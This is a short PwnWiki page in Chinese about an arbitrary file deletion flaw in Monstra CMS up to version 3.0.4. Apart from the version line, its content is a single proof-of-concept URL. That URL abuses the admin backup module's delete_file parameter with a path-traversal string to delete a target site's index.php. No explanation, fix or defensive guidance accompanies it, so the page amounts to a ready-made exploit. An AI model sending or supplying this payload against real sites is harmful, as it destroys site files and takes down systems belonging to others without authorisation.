Monstra CMS 任意文件刪除漏洞

From PwnWiki

Revision as of 15:18, 10 July 2021 by Pwnwiki (talk | contribs) (Marked this version for translation)

(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

Other languages:

Chinese • ‎中文（繁體）‎

漏洞影響

Monstra CMS <= 3.0.4

POC

http://<target>/admin/index.php?id=backup&delete_file=/.......//./.......//./index.php&token=f62369587a94433bb2c3c00264e8705171c6189f

Retrieved from "https://pwnwiki.com/index.php?title=Monstra_CMS_任意文件刪除漏洞&oldid=6644"